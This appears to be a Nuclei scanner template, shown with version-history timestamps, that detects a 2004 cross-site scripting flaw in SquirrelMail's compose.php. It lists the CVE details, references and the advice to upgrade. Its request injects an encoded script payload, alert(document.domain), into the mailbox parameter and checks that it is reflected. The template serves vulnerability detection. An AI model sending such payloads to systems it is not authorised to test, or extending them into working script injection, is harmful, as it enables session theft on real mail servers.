2021-11-15 18:14:18 +00:00
id : CVE-2004-0519
info :
name : SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author : dhiyaneshDk
severity : medium
2022-01-27 18:45:09 +00:00
description : Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
reference :
- https://www.exploit-db.com/exploits/24068
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
2022-05-17 09:18:12 +00:00
- http://security.gentoo.org/glsa/glsa-200405-16.xml
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210209233941/https://www.securityfocus.com/archive/1/361857
2022-05-17 09:18:12 +00:00
remediation : Upgrade to the latest version.
2022-01-28 05:42:09 +00:00
classification :
cve-id : CVE-2004-0519
2022-08-27 04:41:18 +00:00
tags : squirrelmail,cve2004,cve,edb,xss
2022-01-27 18:45:09 +00:00
2021-11-15 18:14:18 +00:00
requests :
- method : GET
path :
2021-11-16 10:13:03 +00:00
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-11-15 18:14:18 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
part : body
2021-11-16 10:13:03 +00:00
words :
- "</script><script>alert(document.domain)</script>"
2021-11-15 18:14:18 +00:00
- type : word
2021-11-16 10:13:03 +00:00
part : header
2021-11-15 18:14:18 +00:00
words :
- "text/html"
2022-01-27 18:45:09 +00:00
# Enhanced by mp on 2022/01/27